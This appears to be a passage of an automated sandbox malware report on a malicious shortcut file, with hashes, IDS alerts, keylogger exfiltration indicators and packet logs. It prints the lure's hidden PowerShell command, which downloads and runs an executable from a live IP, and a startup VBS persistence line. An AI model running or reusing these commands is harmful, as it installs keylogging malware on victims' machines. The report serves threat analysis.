                                                                                                1736977840835b9184f01bf0b6c60ce50d66e7897e18892b3f9e56b6303ef4929b2a1c05b2796.dat-decoded.exeGet hashmaliciousAsyncRATBrowse
                                                                                                • 87.120.112.98
                                                                                                random.exeGet hashmaliciousLiteHTTP BotBrowse
                                                                                                • 87.120.126.5
                                                                                                dlr.mips.elfGet hashmaliciousUnknownBrowse
                                                                                                • 87.120.127.227
                                                                                                1736928425effdd3d663e7ae08ee64667d92e2866d7996db3d213458dc5837f6c732ac1388894.dat-decoded.exeGet hashmaliciousXWormBrowse
                                                                                                • 87.120.116.179
                                                                                                Order Drawing.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                                • 87.120.116.245
                                                                                                Material Requirments.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                                • 87.120.116.245
                                                                                                preliminary drawing.pif.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                                • 87.120.127.120
                                                                                                5tCuNr661k.exeGet hashmaliciousRedLineBrowse
                                                                                                • 87.120.120.86
                                                                                                5tCuNr661k.exeGet hashmaliciousRedLineBrowse
                                                                                                • 87.120.120.86
                                                                                                AS-26496-GO-DADDY-COM-LLCUSPI ITS15235 (2).docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                • 166.62.27.188
                                                                                                Subscription_Renewal_Receipt_2025.htmGet hashmaliciousUnknownBrowse
                                                                                                • 68.178.204.95
                                                                                                http://petruccilaw.com/Get hashmaliciousUnknownBrowse
                                                                                                • 107.180.51.237
                                                                                                NLWfV87ouS.dllGet hashmaliciousWannacryBrowse
                                                                                                • 72.167.90.1
                                                                                                http://www.northamericaniron.comGet hashmaliciousUnknownBrowse
                                                                                                • 50.63.8.11
                                                                                                https://www.xrmtoolbox.com/Get hashmaliciousUnknownBrowse
                                                                                                • 50.63.8.184
                                                                                                mips.elfGet hashmaliciousUnknownBrowse
                                                                                                • 68.178.237.155
                                                                                                UTstKgkJNY.exeGet hashmaliciousDBatLoaderBrowse
                                                                                                • 166.62.27.188
                                                                                                On9ahUpI4R.exeGet hashmaliciousDBatLoaderBrowse
                                                                                                • 166.62.27.188
                                                                                                JDQS879kiy.exeGet hashmaliciousDBatLoaderBrowse
                                                                                                • 166.62.27.188

                                                                                                JA3 Fingerprints

                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                54328bd36c14bd82ddaa0c04b25ed9adINQUIRY LIST 292.vbsGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                • 104.21.96.1
                                                                                                Contrarre.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                • 104.21.96.1
                                                                                                PI ITS15235 (2).docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                • 104.21.96.1
                                                                                                rDEKONT-1_16_2025__75kb__pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                • 104.21.96.1
                                                                                                JHGFDFG.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                • 104.21.96.1
                                                                                                MV. ASL ROSE - VESSEL'S DESC.pdf.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                • 104.21.96.1
                                                                                                New PO.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                • 104.21.96.1
                                                                                                WOOYANG VENUS_VESSEL_PARTICULARS.doc.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                • 104.21.96.1
                                                                                                order6566546663.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                • 104.21.96.1
                                                                                                Order Details.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                • 104.21.96.1
                                                                                                3b5074b1b5d032e5620f69f9f700ff0ePI ITS15235 (2).docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                • 149.154.167.220
                                                                                                • 166.62.28.147
                                                                                                QT202515010642.JPG.PDF.vbsGet hashmaliciousUnknownBrowse
                                                                                                • 149.154.167.220
                                                                                                • 166.62.28.147
                                                                                                rDEKONT-1_16_2025__75kb__pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                • 149.154.167.220
                                                                                                • 166.62.28.147
                                                                                                http://com-evaluate-fanpage30127.pages.dev/help/contact/671203900952887Get hashmaliciousHTMLPhisherBrowse
                                                                                                • 149.154.167.220
                                                                                                • 166.62.28.147
                                                                                                https://docusign6478.weebly.com/Get hashmaliciousUnknownBrowse
                                                                                                • 149.154.167.220
                                                                                                • 166.62.28.147
                                                                                                http://hrpibzdeam.xyz/Get hashmaliciousUnknownBrowse
                                                                                                • 149.154.167.220
                                                                                                • 166.62.28.147
                                                                                                https://cc68b94d-d9d0-4a03-bf37-d58a3335e1ce.p.reviewstudio.com/-/en/Drogerie-K%C3%B6rperpflege/b/?ie=UTF8&node=64187031&ref_=nav_cs_hpcGet hashmaliciousUnknownBrowse
                                                                                                • 149.154.167.220
                                                                                                • 166.62.28.147
                                                                                                http://ciiscp.org/wordpress/mail.uu.se.htmlGet hashmaliciousOutlook PhishingBrowse
                                                                                                • 149.154.167.220
                                                                                                • 166.62.28.147
                                                                                                https://metawavetech-rho.vercel.app/gyQydv$g=JswGhjsY=LbngjTsm_Ln@vGet hashmaliciousUnknownBrowse
                                                                                                • 149.154.167.220
                                                                                                • 166.62.28.147
                                                                                                http://solocyberuser.github.io/netflix/html/home.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                • 149.154.167.220
                                                                                                • 166.62.28.147

                                                                                                Dropped Files

                                                                                                No context

                                                                                                Created / dropped Files

                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):64
                                                                                                Entropy (8bit):1.1940658735648508
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:NlllulJnp/p:NllU
                                                                                                MD5:BC6DB77EB243BF62DC31267706650173
                                                                                                SHA1:9E42FEFC2E92DE0DB2A2C9911C866320E41B30FF
                                                                                                SHA-256:5B000939E436B6D314E3262887D8DB6E489A0DDF1E10E5D3D80F55AA25C9FC27
                                                                                                SHA-512:91DC4935874ECA2A4C8DE303D83081FE945C590208BB844324D1E0C88068495E30AAE2321B3BA8A762BA08DAAEB75D9931522A47C5317766C27E6CE7D04BEEA9
                                                                                                Malicious:false
                                                                                                Reputation:moderate, very likely benign file
                                                                                                Preview:@...e.................................X..............@..........

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dkgygh2k.2u1.psm1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Reputation:high, very likely benign file
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p4vsq3ul.vkv.ps1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\file.exe

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):188928
                                                                                                Entropy (8bit):5.722590906303614
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:QcpVTNm4sNiZAuYu+LGR7lMloafcVxEjh+Gh/UJ1qPDzVMRbqZCxQcDHb+S:l/NMMwu+LGR7lyoafcV6jhzhiELzVMhp
                                                                                                MD5:83E93539D82C1A0DB8E7564F2665911C
                                                                                                SHA1:6B8834D4A236CAEC89FA02816D3B3C1E8BE9573D
                                                                                                SHA-256:B363A0F2509E9F7B9C050C829633A6B9684F68B7B4BB4E89E6387F0DF94EE680
                                                                                                SHA-512:3510EAFCACB3C94F9A3F03B406CA5432F15ECF5A7080298958E408C77E20C70394B2F8A45198787D1496FC98707E245EFF16BF0E28686F0DE3520D38B5E97A7C
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../).g............................>.... ........@.. .......................@............`.....................................O............................ ....................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B................ .......H.......Xf...............................................................(....*..(T...*..{....*..{....*"..}....*..{....*"..}....*..{....*"..}....*F...s....%..o....*....(....&.o+...o\....o+....o]...*..(....s^...%.s.....(....o....&o\...*..(....9 ...r...pr...p.(....(....(_...s`...z*6.{..........*"..(....*..|....(t...9.....|....(u...*(v...*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{ ...*"..} ...*..{!...*"..}!...*..{"...*"..}"...*..{#...*"..}#...*2.|....(w...*..{$...*2.

                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9130e6fa05ed15af.customDestinations-ms (copy)

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):5368
                                                                                                Entropy (8bit):3.4737396502207405
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:Y94SWSHk50/Zlz2SogZoN0NE50/ZlI2SogZoN051:YqJ550/ZxH40m50/ZkH40v
                                                                                                MD5:21D93252BBF1D9AE9F92E8227C54E00D
                                                                                                SHA1:691E81C24E7361888F3B928E9FF585C43486C96E
                                                                                                SHA-256:6A6ED692531506922F95E3462DBF1CF9D01E4F8E3EF74ACA902053135B93725D
                                                                                                SHA-512:9AC00477CEE3DD7F8BDEA0C9ABFF8300A25ED32A17805C09A834768E641291989D26277B2654C5B4ABBD2BDC3ABE3A07EA63DC874704FA4822FE7175B2768C73
                                                                                                Malicious:false
                                                                                                Preview:...................................FL..................F.`.. ......n....J...g..f....g...............................P.O. .:i.....+00.:...:..,.LB.)...A&...&......O........Gp.....N...g....t.2.....0Z.; .ORDER-~1.LNK..X......DW.r0Z.;...........................4..O.R.D.E.R.-.2.0.2.5.7.7.0.0.8...l.n.k.......Z...............-.......Y............3.m.....C:\Users\user\Desktop\ORDER-202577008.lnk..'.C.:.\.U.s.e.r.s.\.A.d.m.i.n.i.s.t.r.a.t.o.r.\.D.e.s.k.t.o.p.\.z.a.m.p...i.c.o.........%SystemDrive%\Users\Administrator\Desktop\zamp.ico..................................................................................................................................................................................................................%.S.y.s.t.e.m.D.r.i.v.e.%.\.U.s.e.r.s.\.A.d.m.i.n.i.s.t.r.a.t.o.r.\.D.e.s.k.t.o.p.\.z.a.m.p...i.c.o.........................................................................................................................................................

                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\S5C4OWRG6FJZ6H2GOJ3S.temp

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):5368
                                                                                                Entropy (8bit):3.4737396502207405
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:Y94SWSHk50/Zlz2SogZoN0NE50/ZlI2SogZoN051:YqJ550/ZxH40m50/ZkH40v
                                                                                                MD5:21D93252BBF1D9AE9F92E8227C54E00D
                                                                                                SHA1:691E81C24E7361888F3B928E9FF585C43486C96E
                                                                                                SHA-256:6A6ED692531506922F95E3462DBF1CF9D01E4F8E3EF74ACA902053135B93725D
                                                                                                SHA-512:9AC00477CEE3DD7F8BDEA0C9ABFF8300A25ED32A17805C09A834768E641291989D26277B2654C5B4ABBD2BDC3ABE3A07EA63DC874704FA4822FE7175B2768C73
                                                                                                Malicious:false
                                                                                                Preview:...................................FL..................F.`.. ......n....J...g..f....g...............................P.O. .:i.....+00.:...:..,.LB.)...A&...&......O........Gp.....N...g....t.2.....0Z.; .ORDER-~1.LNK..X......DW.r0Z.;...........................4..O.R.D.E.R.-.2.0.2.5.7.7.0.0.8...l.n.k.......Z...............-.......Y............3.m.....C:\Users\user\Desktop\ORDER-202577008.lnk..'.C.:.\.U.s.e.r.s.\.A.d.m.i.n.i.s.t.r.a.t.o.r.\.D.e.s.k.t.o.p.\.z.a.m.p...i.c.o.........%SystemDrive%\Users\Administrator\Desktop\zamp.ico..................................................................................................................................................................................................................%.S.y.s.t.e.m.D.r.i.v.e.%.\.U.s.e.r.s.\.A.d.m.i.n.i.s.t.r.a.t.o.r.\.D.e.s.k.t.o.p.\.z.a.m.p...i.c.o.........................................................................................................................................................

                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TypeId.vbs

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\Temp\file.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):82
                                                                                                Entropy (8bit):4.857628608768195
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:FER/n0eFHHoUkh4EaKC5fwn:FER/lFHI9aZ5o
                                                                                                MD5:438BA7F5DEA759F6A37AC79E1D3DEBB3
                                                                                                SHA1:80F6C546C47594600FA09415F4EF69E7B2D19562
                                                                                                SHA-256:AC1C148529B7D96E3F16B84937C9FFD6B3382A40C0F2334EEB0DC1086B32F837
                                                                                                SHA-512:F634916C8ADB0694D6831C0714DAE486B99FF644A7A43DDDDDAB824701A2580AEB0D873EE7ECE6400CA2B61F4223362DE86A38144DBC9760B69D19216652CA2F
                                                                                                Malicious:true
                                                                                                Preview:CreateObject("WScript.Shell").Run """C:\Users\user\AppData\Roaming\TypeId.exe"""

                                                                                                C:\Users\user\AppData\Roaming\TypeId.exe

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\Temp\file.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:modified
                                                                                                Size (bytes):188928
                                                                                                Entropy (8bit):5.722590906303614
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:QcpVTNm4sNiZAuYu+LGR7lMloafcVxEjh+Gh/UJ1qPDzVMRbqZCxQcDHb+S:l/NMMwu+LGR7lyoafcV6jhzhiELzVMhp
                                                                                                MD5:83E93539D82C1A0DB8E7564F2665911C
                                                                                                SHA1:6B8834D4A236CAEC89FA02816D3B3C1E8BE9573D
                                                                                                SHA-256:B363A0F2509E9F7B9C050C829633A6B9684F68B7B4BB4E89E6387F0DF94EE680
                                                                                                SHA-512:3510EAFCACB3C94F9A3F03B406CA5432F15ECF5A7080298958E408C77E20C70394B2F8A45198787D1496FC98707E245EFF16BF0E28686F0DE3520D38B5E97A7C
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../).g............................>.... ........@.. .......................@............`.....................................O............................ ....................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B................ .......H.......Xf...............................................................(....*..(T...*..{....*..{....*"..}....*..{....*"..}....*..{....*"..}....*F...s....%..o....*....(....&.o+...o\....o+....o]...*..(....s^...%.s.....(....o....&o\...*..(....9 ...r...pr...p.(....(....(_...s`...z*6.{..........*"..(....*..|....(t...9.....|....(u...*(v...*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{ ...*"..} ...*..{!...*"..}!...*..{"...*"..}"...*..{#...*"..}#...*2.|....(w...*..{$...*2.

                                                                                                Static File Info

                                                                                                General

                                                                                                File type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Icon number=0, Archive, ctime=Thu Aug 22 09:59:47 2013, mtime=Thu Aug 22 09:59:47 2013, atime=Thu Aug 22 09:59:47 2013, length=479744, window=hide
                                                                                                Entropy (8bit):3.4027436845991015
                                                                                                TrID:
                                                                                                • Windows Shortcut (20020/1) 100.00%
                                                                                                File name:ORDER-202577008.lnk
                                                                                                File size:2'288 bytes
                                                                                                MD5:f5d22b3d80cde02b17d97b4c8558eb72
                                                                                                SHA1:64ee3a115979a3b3e2cb82cafa7fd987c2533e29
                                                                                                SHA256:6ac9c6530a44086277078565059ebee1e473173cdc6dea11616eb51ac02ef0dc
                                                                                                SHA512:ec204c72b6c925237b106c9d3827888b79a5a87edfbb47e537cb78f9c4fee792bf1d696c0048e6eebba2128a603e406a6baef88be53552888064d002174978dc
                                                                                                SSDEEP:24:8WKYmA8RQDv12G0UkKIWvA2Wkp+/CWkiAGfFRNuUMkWU5wiOZOHV1nGKACCt:8WKYps24EIRNuHwwinEKACW
                                                                                                TLSH:A7419E052BF5A624E6B7AA7A9CF573118A3AB806DE118F4F026089455861354EC74F3F
                                                                                                File Content Preview:L..................F.@.. ...>=..&...>=..&....)t.&....R...........................P.O. .:i.....+00.../C:\...................V.1.....+ZZ...Windows.@........C.l+ZZ.....-.....................M.?.W.i.n.d.o.w.s.....Z.1.....+Z.V..System32..B........C.l+Z.V....=.

                                                                                                File Icon

                                                                                                Icon Hash:74f0e4e4e4e1e1ed

                                                                                                Static Windows Shortcut Info

                                                                                                General

                                                                                                Relative Path:..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Command Line Argument:-windowstyle hidden -command "& { Invoke-WebRequest -Uri http://87.120.113.91/chrome.exe -OutFile %TEMP%\file.exe; Start-Process '%TEMP%\file.exe' }"
                                                                                                Icon location:C:\Users\Administrator\Desktop\zamp.ico

                                                                                                Network Behavior

                                                                                                Suricata IDS Alerts

                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                2025-01-16T08:30:39.842447+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity2192.168.2.54970587.120.113.9180TCP
                                                                                                2025-01-16T08:30:39.842499+01001810003Joe Security ANOMALY Windows PowerShell HTTP PE File Download287.120.113.9180192.168.2.549705TCP
                                                                                                2025-01-16T08:30:56.842613+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549752193.122.6.16880TCP
                                                                                                2025-01-16T08:31:02.967639+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549752193.122.6.16880TCP
                                                                                                2025-01-16T08:31:03.599610+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.549799149.154.167.220443TCP
                                                                                                2025-01-16T08:31:04.158058+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.549799149.154.167.220443TCP
                                                                                                2025-01-16T08:31:23.358299+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549926132.226.247.7380TCP
                                                                                                2025-01-16T08:31:29.483329+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549926132.226.247.7380TCP
                                                                                                2025-01-16T08:31:30.199698+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.549976149.154.167.220443TCP
                                                                                                2025-01-16T08:31:30.638623+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.549976149.154.167.220443TCP

                                                                                                Network Port Distribution

                                                                                                TCP Packets

                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                Jan 16, 2025 08:30:39.223622084 CET4970580192.168.2.587.120.113.91
                                                                                                Jan 16, 2025 08:30:39.228406906 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:39.228481054 CET4970580192.168.2.587.120.113.91
                                                                                                Jan 16, 2025 08:30:39.235419035 CET4970580192.168.2.587.120.113.91
                                                                                                Jan 16, 2025 08:30:39.240225077 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:39.842345953 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:39.842361927 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:39.842447042 CET4970580192.168.2.587.120.113.91
                                                                                                Jan 16, 2025 08:30:39.842499018 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:39.842511892 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:39.842524052 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:39.842535019 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:39.842546940 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:39.842557907 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:39.842570066 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:39.842581034 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:39.842595100 CET4970580192.168.2.587.120.113.91
                                                                                                Jan 16, 2025 08:30:39.842632055 CET4970580192.168.2.587.120.113.91
                                                                                                Jan 16, 2025 08:30:39.847356081 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:39.847374916 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:39.847385883 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:39.847443104 CET4970580192.168.2.587.120.113.91
                                                                                                Jan 16, 2025 08:30:39.889456034 CET4970580192.168.2.587.120.113.91
                                                                                                Jan 16, 2025 08:30:39.930955887 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:39.930975914 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:39.931035995 CET4970580192.168.2.587.120.113.91
                                                                                                Jan 16, 2025 08:30:39.931087017 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:39.931099892 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:39.931111097 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:39.931122065 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:39.931133032 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:39.931150913 CET4970580192.168.2.587.120.113.91
                                                                                                Jan 16, 2025 08:30:39.931204081 CET4970580192.168.2.587.120.113.91
                                                                                                Jan 16, 2025 08:30:39.931914091 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:39.931926012 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:39.931936979 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:39.931947947 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:39.931960106 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:39.931977034 CET4970580192.168.2.587.120.113.91
                                                                                                Jan 16, 2025 08:30:39.932008028 CET4970580192.168.2.587.120.113.91
                                                                                                Jan 16, 2025 08:30:39.932745934 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:39.932756901 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:39.932769060 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:39.932779074 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:39.932790995 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:39.932817936 CET4970580192.168.2.587.120.113.91
                                                                                                Jan 16, 2025 08:30:39.932902098 CET4970580192.168.2.587.120.113.91
                                                                                                Jan 16, 2025 08:30:39.933464050 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:39.933475018 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:39.933486938 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:39.933535099 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:39.933546066 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:39.933556080 CET4970580192.168.2.587.120.113.91
                                                                                                Jan 16, 2025 08:30:39.933573961 CET4970580192.168.2.587.120.113.91
                                                                                                Jan 16, 2025 08:30:39.933595896 CET4970580192.168.2.587.120.113.91
                                                                                                Jan 16, 2025 08:30:39.934289932 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:39.983227968 CET4970580192.168.2.587.120.113.91
                                                                                                Jan 16, 2025 08:30:40.019495010 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.019526005 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.019577980 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.019594908 CET4970580192.168.2.587.120.113.91
                                                                                                Jan 16, 2025 08:30:40.019623041 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.019634008 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.019663095 CET4970580192.168.2.587.120.113.91
                                                                                                Jan 16, 2025 08:30:40.019870043 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.019913912 CET4970580192.168.2.587.120.113.91
                                                                                                Jan 16, 2025 08:30:40.019937992 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.019951105 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.019961119 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.019988060 CET4970580192.168.2.587.120.113.91
                                                                                                Jan 16, 2025 08:30:40.020299911 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.020317078 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.020361900 CET4970580192.168.2.587.120.113.91
                                                                                                Jan 16, 2025 08:30:40.020402908 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.020416975 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.020427942 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.020437956 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.020446062 CET4970580192.168.2.587.120.113.91
                                                                                                Jan 16, 2025 08:30:40.020450115 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.020459890 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.020479918 CET4970580192.168.2.587.120.113.91
                                                                                                Jan 16, 2025 08:30:40.020509005 CET4970580192.168.2.587.120.113.91
                                                                                                Jan 16, 2025 08:30:40.021094084 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.021151066 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.021152973 CET4970580192.168.2.587.120.113.91
                                                                                                Jan 16, 2025 08:30:40.021162033 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.021212101 CET4970580192.168.2.587.120.113.91
                                                                                                Jan 16, 2025 08:30:40.021225929 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.021236897 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.021249056 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.021260023 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.021270990 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.021274090 CET4970580192.168.2.587.120.113.91
                                                                                                Jan 16, 2025 08:30:40.021300077 CET4970580192.168.2.587.120.113.91
                                                                                                Jan 16, 2025 08:30:40.022062063 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.022114992 CET4970580192.168.2.587.120.113.91
                                                                                                Jan 16, 2025 08:30:40.022149086 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.022161007 CET804970587.120.113.91192.168.2.5
